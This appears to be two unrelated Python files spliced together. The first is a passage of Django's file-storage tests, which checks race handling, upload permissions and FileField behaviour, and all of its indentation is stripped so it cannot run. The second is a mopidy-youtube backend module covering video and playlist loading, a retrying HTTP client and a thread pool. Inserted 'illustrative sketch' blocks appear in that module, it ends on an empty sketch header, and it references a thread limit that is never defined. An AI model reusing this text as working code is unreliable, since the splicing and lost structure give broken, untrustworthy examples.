os.path.join(self.temp_dir2, mixed_case),
other_temp_storage.path(mixed_case),
)
other_temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path, mode=0o777, exist_ok=False):
if path == os.path.join(self.temp_dir, "normal"):
real_makedirs(path, mode, exist_ok)
elif path == os.path.join(self.temp_dir, "raced"):
real_makedirs(path, mode, exist_ok)
if not exist_ok:
raise FileExistsError()
elif path == os.path.join(self.temp_dir, "error"):
raise PermissionError()
else:
self.fail("unexpected argument %r" % path)
try:
os.makedirs = fake_makedirs
self.storage.save("normal/test.file", ContentFile("saved normally"))
with self.storage.open("normal/test.file") as f:
self.assertEqual(f.read(), b"saved normally")
self.storage.save("raced/test.file", ContentFile("saved with race"))
with self.storage.open("raced/test.file") as f:
self.assertEqual(f.read(), b"saved with race")
# Exceptions aside from FileExistsError are raised.
with self.assertRaises(PermissionError):
self.storage.save("error/test.file", ContentFile("not saved"))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, "normal.file"):
real_remove(path)
elif path == os.path.join(self.temp_dir, "raced.file"):
real_remove(path)
raise FileNotFoundError()
elif path == os.path.join(self.temp_dir, "error.file"):
raise PermissionError()
else:
self.fail("unexpected argument %r" % path)
try:
os.remove = fake_remove
self.storage.save("normal.file", ContentFile("delete normally"))
self.storage.delete("normal.file")
self.assertFalse(self.storage.exists("normal.file"))
self.storage.save("raced.file", ContentFile("delete with race"))
self.storage.delete("raced.file")
self.assertFalse(self.storage.exists("normal.file"))
# Exceptions aside from FileNotFoundError are raised.
self.storage.save("error.file", ContentFile("delete with error"))
with self.assertRaises(PermissionError):
self.storage.delete("error.file")
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behavior when file.chunks() raises an error.
"""
f1 = ContentFile("chunks fails")
def failing_chunks():
raise OSError
f1.chunks = failing_chunks
with self.assertRaises(OSError):
self.storage.save("error.file", f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
msg = "The name must be given to delete()."
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete(None)
with self.assertRaisesMessage(ValueError, msg):
self.storage.delete("")
def test_delete_deletes_directories(self):
tmp_dir = tempfile.mkdtemp(dir=self.storage.location)
self.storage.delete(tmp_dir)
self.assertFalse(os.path.exists(tmp_dir))
@override_settings(
MEDIA_ROOT="media_root",
MEDIA_URL="media_url/",
FILE_UPLOAD_PERMISSIONS=0o777,
FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o777,
)
def test_setting_changed(self):
"""
Properties using settings values as defaults should be updated when the
referenced settings change, while explicitly specified values should be
unchanged.
"""
storage = self.storage_class(
location="explicit_location",
base_url="explicit_base_url/",
file_permissions_mode=0o666,
directory_permissions_mode=0o666,
)
defaults_storage = self.storage_class()
settings = {
"MEDIA_ROOT": "overridden_media_root",
"MEDIA_URL": "/overridden_media_url/",
"FILE_UPLOAD_PERMISSIONS": 0o333,
"FILE_UPLOAD_DIRECTORY_PERMISSIONS": 0o333,
}
with self.settings(**settings):
self.assertEqual(storage.base_location, "explicit_location")
self.assertIn("explicit_location", storage.location)
self.assertEqual(storage.base_url, "explicit_base_url/")
self.assertEqual(storage.file_permissions_mode, 0o666)
self.assertEqual(storage.directory_permissions_mode, 0o666)
self.assertEqual(defaults_storage.base_location, settings["MEDIA_ROOT"])
self.assertIn(settings["MEDIA_ROOT"], defaults_storage.location)
self.assertEqual(defaults_storage.base_url, settings["MEDIA_URL"])
self.assertEqual(
defaults_storage.file_permissions_mode,
settings["FILE_UPLOAD_PERMISSIONS"],
)
self.assertEqual(
defaults_storage.directory_permissions_mode,
settings["FILE_UPLOAD_DIRECTORY_PERMISSIONS"],
)
def test_file_methods_pathlib_path(self):
p = Path("test.file")
self.assertFalse(self.storage.exists(p))
f = ContentFile("custom contents")
f_name = self.storage.save(p, f)
# Storage basic methods.
self.assertEqual(self.storage.path(p), os.path.join(self.temp_dir, p))
self.assertEqual(self.storage.size(p), 15)
self.assertEqual(self.storage.url(p), self.storage.base_url + f_name)
with self.storage.open(p) as f:
self.assertEqual(f.read(), b"custom contents")
self.addCleanup(self.storage.delete, p)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
basename, *ext = os.path.splitext(name)
number = 2
while self.exists(name):
name = "".join([basename, ".", str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save("custom_storage", ContentFile("custom contents"))
self.assertEqual(first, "custom_storage")
second = self.storage.save("custom_storage", ContentFile("more contents"))
self.assertEqual(second, "custom_storage.2")
self.storage.delete(first)
self.storage.delete(second)
class OverwritingStorage(FileSystemStorage):
"""
Overwrite existing files instead of appending a suffix to generate an
unused name.
"""
# Mask out O_EXCL so os.open() doesn't raise OSError if the file exists.
OS_OPEN_FLAGS = FileSystemStorage.OS_OPEN_FLAGS & ~os.O_EXCL
def get_available_name(self, name, max_length=None):
"""Override the effort to find an used name."""
return name
class OverwritingStorageTests(FileStorageTests):
storage_class = OverwritingStorage
def test_save_overwrite_behavior(self):
"""Saving to same file name twice overwrites the first file."""
name = "test.file"
self.assertFalse(self.storage.exists(name))
content_1 = b"content one"
content_2 = b"second content"
f_1 = ContentFile(content_1)
f_2 = ContentFile(content_2)
stored_name_1 = self.storage.save(name, f_1)
try:
self.assertEqual(stored_name_1, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_1)
stored_name_2 = self.storage.save(name, f_2)
self.assertEqual(stored_name_2, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_2)
finally:
self.storage.delete(name)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ""
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO("content")
self.storage.save("tests/stringio", output)
self.assertTrue(self.storage.exists("tests/stringio"))
with self.storage.open("tests/stringio") as f:
self.assertEqual(f.read(), b"content")
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, "PC_NAME_MAX")
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(
obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX
)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content")
)
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(
list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"]
)
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(
normal=SimpleUploadedFile("rewritten.txt", b"content")
)
with obj.normal as normal:
normal.open("wb")
normal.write(b"updated")
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b"updated")
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(
normal=SimpleUploadedFile("reopen.txt", b"content")
)
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(
names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX
)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename gets truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = "filename.ext"
for o in objs:
o.limited_length.save(filename, ContentFile("Same Content"))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], "tests/%s" % filename)
self.assertRegex(names[1], "tests/fi_%s.ext" % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = "short.longext"
objs[0].limited_length.save(filename, ContentFile("Same Content"))
with self.assertRaisesMessage(
SuspiciousFileOperation, "Storage can not find an available filename"
):
objs[1].limited_length.save(*(filename, ContentFile("Same Content")))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform == "win32",
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (
self._storage_max_filename_length(temp_storage) - 4
) * "a" # 4 chars for extension.
obj = Storage()
obj.extended_length.save("%s.txt" % filename, ContentFile("Same Content"))
self.assertEqual(obj.extended_length.name, "tests/%s.txt" % filename)
self.assertEqual(obj.extended_length.read(), b"Same Content")
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save("tests/default.txt", ContentFile("default content"))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use a subdirectory.
obj = Storage()
obj.empty.save("django_test.txt", ContentFile("more content"))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_pathlib_upload_to(self):
obj = Storage()
obj.pathlib_callable.save("some_file1.txt", ContentFile("some content"))
self.assertEqual(obj.pathlib_callable.name, "bar/some_file1.txt")
obj.pathlib_direct.save("some_file2.txt", ContentFile("some content"))
self.assertEqual(obj.pathlib_direct.name, "bar/some_file2.txt")
obj.random.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save("tests/example.txt", ContentFile("some content"))
# Load it as Python file object
with open(temp_storage.path("tests/example.txt")) as file_obj:
# Save it using storage and read its content
temp_storage.save("tests/file_obj", file_obj)
self.assertTrue(temp_storage.exists("tests/file_obj"))
with temp_storage.open("tests/file_obj") as f:
self.assertEqual(f.read(), b"some content")
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write("content")
output.seek(0)
# Save it and read written file
temp_storage.save("tests/stringio", output)
self.assertTrue(temp_storage.exists("tests/stringio"))
with temp_storage.open("tests/stringio") as f:
self.assertEqual(f.read(), b"content")
class FieldCallableFileStorageTests(SimpleTestCase):
def setUp(self):
self.temp_storage_location = tempfile.mkdtemp(
suffix="filefield_callable_storage"
)
def tearDown(self):
shutil.rmtree(self.temp_storage_location)
def test_callable_base_class_error_raises(self):
class NotStorage:
pass
msg = "FileField.storage must be a subclass/instance of django.core.files.storage.Storage"
for invalid_type in (NotStorage, str, list, set, tuple):
with self.subTest(invalid_type=invalid_type):
with self.assertRaisesMessage(TypeError, msg):
FileField(storage=invalid_type)
def test_file_field_storage_none_uses_default_storage(self):
self.assertEqual(FileField().storage, default_storage)
def test_callable_function_storage_file_field(self):
storage = FileSystemStorage(location=self.temp_storage_location)
def get_storage():
return storage
obj = FileField(storage=get_storage)
self.assertEqual(obj.storage, storage)
self.assertEqual(obj.storage.location, storage.location)
def test_callable_class_storage_file_field(self):
class GetStorage(FileSystemStorage):
pass
obj = FileField(storage=GetStorage)
self.assertIsInstance(obj.storage, BaseStorage)
def test_callable_storage_file_field_in_model(self):
obj = Storage()
self.assertEqual(obj.storage_callable.storage, temp_storage)
self.assertEqual(obj.storage_callable.storage.location, temp_storage_location)
self.assertIsInstance(obj.storage_callable_class.storage, BaseStorage)
def test_deconstruction(self):
"""
Deconstructing gives the original callable, not the evaluated value.
"""
obj = Storage()
*_, kwargs = obj._meta.get_field("storage_callable").deconstruct()
storage = kwargs["storage"]
self.assertIs(storage, callable_storage)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=["conflict"])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file("conflict")
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], "conflict")
self.assertRegex(files[1], "conflict_%s" % FILE_SUFFIX_REGEX)
@unittest.skipIf(
sys.platform == "win32", "Windows only partially supports umasks and chmod."
)
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/subdir/the_file", ContentFile("data"))
file_path = Path(self.storage.path(name))
self.assertEqual(file_path.parent.stat().st_mode & 0o777, 0o765)
self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/subdir/the_file", ContentFile("data"))
file_path = Path(self.storage.path(name))
expected_mode = 0o777 & ~self.umask
self.assertEqual(file_path.parent.stat().st_mode & 0o777, expected_mode)
self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, expected_mode)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save("dotted.path/test", ContentFile("1"))
self.storage.save("dotted.path/test", ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, "dotted.path")))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, "dotted_.path")))
self.assertEqual(files[0], "test")
self.assertRegex(files[1], "test_%s" % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save("dotted.path/.test", ContentFile("1"))
self.storage.save("dotted.path/.test", ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, "dotted.path")))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, "dotted_.path")))
self.assertEqual(files[0], ".test")
self.assertRegex(files[1], ".test_%s" % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save("bytes.txt", ContentFile(b"content"))
self.storage.save("unicode.txt", ContentFile("español"))
@override_settings(ROOT_URLCONF="file_storage.urls")
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib_request_urlopen(self):
"""
Test the File storage API with a file-like object coming from
urllib.request.urlopen().
"""
file_like_object = urlopen(self.live_server_url + "/")
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + "/")
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
youtube.py
|
import re
import threading
import traceback
import pykka
import requests
import youtube_dl
from cachetools import LRUCache, cached
from mopidy.models import Image
from mopidy_youtube import logger
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
api_enabled = False
# decorator for creating async properties using pykka.ThreadingFuture
# A property 'foo' should have a future '_foo'
# On first call we invoke func() which should create the future
# On subsequent calls we just return the future
#
def async_property(func):
_future_name = "_" + func.__name__
def wrapper(self):
if _future_name not in self.__dict__:
func(self) # should create the future
return self.__dict__[_future_name]
return property(wrapper)
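# Illustrative sketch (assumption, not part of the original backend): how a class
# is expected to use async_property. The decorated body creates and resolves the
# matching '_name' future; every later access returns that same future.
class _ExampleAsyncHolder:
    @async_property
    def greeting(self):
        self._greeting = pykka.ThreadingFuture()
        self._greeting.set("resolved in the background")
# _ExampleAsyncHolder().greeting.get() -> "resolved in the background"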
# The Video / Playlist classes can be used to load YouTube data. If
# 'api_enabled' is true (and a valid youtube_api_key supplied), most data are
# loaded using the (very much faster) YouTube Data API. If 'api_enabled' is
# false, most data are loaded using requests and regex. Requests and regex
# are many times slower than using the API.
#
# eg
# video = youtube.Video.get('7uj0hOIm2kY')
# video.length # non-blocking, returns future
# ... later ...
# print(video.length.get())  # blocks until info arrives, if it hasn't already
#
# Entry is a base class of Video and Playlist
#
class Entry:
cache_max_len = 400
# Use Video.get(id), Playlist.get(id), instead of Video(id), Playlist(id),
# to fetch a cached object, if available
#
@classmethod
@cached(cache=LRUCache(maxsize=cache_max_len))
def get(cls, id):
obj = cls()
obj.id = id
return obj
# Search for both videos and playlists using a single API call. Fetches
# only title, thumbnails, channel (extra queries are needed for length and
# video_count)
#
@classmethod
def search(cls, q):
def create_object(item):
set_api_data = ["title", "channel"]
if item["id"]["kind"] == "youtube#video":
obj = Video.get(item["id"]["videoId"])
if "contentDetails" in item:
set_api_data.append("length")
elif item["id"]["kind"] == "youtube#playlist":
obj = Playlist.get(item["id"]["playlistId"])
if "contentDetails" in item:
set_api_data.append("video_count")
# elif item['id']['kind'] == 'youtube#radiolist':
# obj = Video.get(item['id']['videoId'])
# set_api_data = ['title', 'video_count']
else:
obj = []
return obj
if "thumbnails" in item["snippet"]:
set_api_data.append("thumbnails")
obj._set_api_data(set_api_data, item)
return obj
try:
data = cls.api.search(q)
except Exception as e:
logger.error('search error "%s"', e)
return None
try:
return list(map(create_object, data["items"]))
except Exception as e:
logger.error('map error "%s"', e)
return None
# Adds futures for the given fields to all objects in list, unless they
# already exist. Returns objects for which at least one future was added
#
@classmethod
def _add_futures(cls, futures_list, fields):
def add(obj):
added = False
for k in fields:
if "_" + k not in obj.__dict__:
obj.__dict__["_" + k] = pykka.ThreadingFuture()
added = True
return added
return list(filter(add, futures_list))
# common Video/Playlist properties go to the base class
#
@async_property
def title(self):
self.load_info([self])
@async_property
def channel(self):
self.load_info([self])
# sets the given 'fields' of 'self', based on the 'item'
# data retrieved through the API
#
def _set_api_data(self, fields, item):
for k in fields:
_k = "_" + k
future = self.__dict__.get(_k)
if not future:
future = self.__dict__[_k] = pykka.ThreadingFuture()
if not future._queue.empty(): # hack, no public is_set()
continue
if not item:
val = None
elif k == "title":
val = item["snippet"]["title"]
elif k == "channel":
val = item["snippet"]["channelTitle"]
elif k == "length":
# convert PT1H2M10S to 3730
m = re.search(
r"P((?P<weeks>\d+)W)?"
+ r"((?P<days>\d+)D)?"
+ r"T((?P<hours>\d+)H)?"
+ r"((?P<minutes>\d+)M)?"
+ r"((?P<seconds>\d+)S)?",
item["contentDetails"]["duration"],
)
val = (
int(m.group("weeks") or 0) * 604800
+ int(m.group("days") or 0) * 86400
+ int(m.group("hours") or 0) * 3600
+ int(m.group("minutes") or 0) * 60
+ int(m.group("seconds") or 0)
)
elif k == "video_count":
val = min(
int(item["contentDetails"]["itemCount"]),
int(self.playlist_max_videos),
)
elif k == "thumbnails":
val = [
val["url"]
for (key, val) in item["snippet"]["thumbnails"].items()
if key in ["default", "medium", "high"]
]
future.set(val)
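# Illustrative sketch (not part of the original backend): the ISO-8601 duration
# parsing used for 'length' above, shown standalone. 'PT1H2M10S' -> 3730 seconds.
def _parse_iso8601_duration(duration):
    m = re.search(
        r"P((?P<weeks>\d+)W)?"
        r"((?P<days>\d+)D)?"
        r"T((?P<hours>\d+)H)?"
        r"((?P<minutes>\d+)M)?"
        r"((?P<seconds>\d+)S)?",
        duration,
    )
    return (
        int(m.group("weeks") or 0) * 604800
        + int(m.group("days") or 0) * 86400
        + int(m.group("hours") or 0) * 3600
        + int(m.group("minutes") or 0) * 60
        + int(m.group("seconds") or 0)
    )
# _parse_iso8601_duration("PT1H2M10S") == 3730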
class Video(Entry):
# loads title, length, channel of multiple videos using one API call for
# every 50 videos. API calls are split in separate threads.
#
@classmethod
def load_info(cls, list):
fields = ["title", "length", "channel"]
list = cls._add_futures(list, fields)
def job(sublist):
try:
data = cls.api.list_videos([x.id for x in sublist])
dict = {item["id"]: item for item in data["items"]}
except Exception as e:
logger.error('list_videos error "%s"', e)
dict = {}
for video in sublist:
video._set_api_data(fields, dict.get(video.id))
# 50 items at a time, make sure order is deterministic so that HTTP
# requests are replayable in tests
for i in range(0, len(list), 50):
sublist = list[i : i + 50]
ThreadPool.run(job, (sublist,))
@async_property
def length(self):
self.load_info([self])
@async_property
def thumbnails(self):
# make it "async" for uniformity with Playlist.thumbnails
identifier = self.id.split(".")[-1]
self._thumbnails = pykka.ThreadingFuture()
self._thumbnails.set(
[
Image(uri=f"https://i.ytimg.com/vi/{identifier}/{type}.jpg")
for type in ["default", "mqdefault", "hqdefault"]
]
)
# audio_url is the only property retrieved using youtube_dl; it's much more
# expensive than the rest
#
@async_property
def audio_url(self):
self._audio_url = pykka.ThreadingFuture()
def job():
try:
info = youtube_dl.YoutubeDL(
{
"format": "bestaudio/best",
"proxy": self.proxy,
"nocheckcertificate": True,
}
).extract_info(
url="https://www.youtube.com/watch?v=%s" % self.id,
download=False,
ie_key=None,
extra_info={},
process=True,
force_generic_extractor=False,
)
except Exception as e:
logger.error('audio_url error "%s"', e)
self._audio_url.set(None)
return
self._audio_url.set(info["url"])
ThreadPool.run(job)
@property
def is_video(self):
return True
class Playlist(Entry):
# loads title, thumbnails, video_count, channel of multiple playlists using
# one API call for every 50 lists. API calls are split in separate threads.
#
@classmethod
def load_info(cls, list):
fields = ["title", "video_count", "thumbnails", "channel"]
list = cls._add_futures(list, fields)
def job(sublist):
try:
data = cls.api.list_playlists([x.id for x in sublist])
dict = {item["id"]: item for item in data["items"]}
except Exception as e:
logger.error('list_playlists error "%s"', e)
dict = {}
for pl in sublist:
pl._set_api_data(fields, dict.get(pl.id))
# 50 items at a time, make sure order is deterministic so that HTTP
# requests are replayable in tests
for i in range(0, len(list), 50):
sublist = list[i : i + 50]
ThreadPool.run(job, (sublist,))
# loads the list of videos of a playlist using one API call for every 50
# fetched videos. For every page fetched, Video.load_info is called to
# start loading video info in a separate thread.
#
@async_property
def videos(self):
self._videos = pykka.ThreadingFuture()
def job():
all_videos = []
page = ""
while (
page is not None and len(all_videos) < self.playlist_max_videos
):
try:
max_results = min(
int(self.playlist_max_videos) - len(all_videos), 50
)
data = self.api.list_playlistitems(
self.id, page, max_results
)
except Exception as e:
logger.error('list playlist items error "%s"', e)
break
if "error" in data:
logger.error("error in list playlist items data")
break
page = data.get("nextPageToken") or None
myvideos = []
for item in data["items"]:
set_api_data = ["title", "channel"]
if "contentDetails" in item:
set_api_data.append("length")
if "thumbnails" in item["snippet"]:
set_api_data.append("thumbnails")
video = Video.get(item["snippet"]["resourceId"]["videoId"])
video._set_api_data(set_api_data, item)
myvideos.append(video)
all_videos += myvideos
# start loading video info for this batch in the background
Video.load_info(
[
x
for _, x in zip(
range(self.playlist_max_videos), myvideos
)
]
) # noqa: E501
self._videos.set(
[x for _, x in zip(range(self.playlist_max_videos), all_videos)]
) # noqa: E501
ThreadPool.run(job)
@async_property
def video_count(self):
self.load_info([self])
@async_property
def thumbnails(self):
self.load_info([self])
@property
def is_video(self):
return False
class Client:
def __init__(self, proxy, headers):
if not hasattr(type(self), "session"):
self._create_session(proxy, headers)
@classmethod
def _create_session(
cls,
proxy,
headers,
retries=3,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
session=None,
):
cls.session = session or requests.Session()
retry = Retry(
total=retries,
read=retries,
connect=retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist,
)
adapter = HTTPAdapter(
max_retries=retry, pool_maxsize=ThreadPool.threads_max
)
cls.session.mount("http://", adapter)
cls.session.mount("https://", adapter)
cls.session.proxies = {"http": proxy, "https": proxy}
cls.session.headers = headers
@classmethod
def format_duration(cls, match):
duration = ""
if match.group("durationHours") is not None:
duration += match.group("durationHours") + "H"
if match.group("durationMinutes") is not None:
duration += match.group("durationMinutes") + "M"
if match.group("durationSeconds") is not None:
duration += match.group("durationSeconds") + "S"
return duration
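# --- Illustrative sketch (not part of the original module) ---
# Client lazily creates one shared requests.Session per class, mounted with a
# retrying HTTPAdapter (3 retries with backoff on HTTP 500/502/504). A
# hypothetical subclass would chain to the constructor once (which builds the
# session on first instantiation) and then reuse that shared session:
class _ExampleClient(Client):
    def get_json(self, url):
        # type(self).session is the shared, retry-enabled session set up above
        return type(self).session.get(url, timeout=10).json()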
# simple 'dynamic' thread pool. Threads are created when new jobs arrive, stay
# active for as long as there are active jobs, and get destroyed afterwards
# (so that there are no long-term threads staying active)
#
class ThreadPool:
threads_active = 0
jobs = []
lock = threading.Lock() # controls access to threads_active and jobs
@classmethod
def worker(cls):
while True:
cls.lock.acquire()
if len(cls.jobs):
f, args = cls.jobs.pop()
else:
# no more jobs, exit thread
cls.threads_active -= 1
cls.lock.release()
break
cls.lock.release()
try:
f(*args)
except Exception as e:
logger.error(
"youtube thread error: %s\n%s", e, traceback.format_exc()
)
@classmethod
def run(cls, f, args=()):
cls.lock.acquire()
cls.jobs.append((f, args))
if cls.threads_active < cls.threads_max:
thread = threading.Thread(target=cls.worker)
thread.daemon = True
thread.start()
cls.threads_active += 1
cls.lock.release()
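# --- Illustrative sketch (not part of the original module) ---
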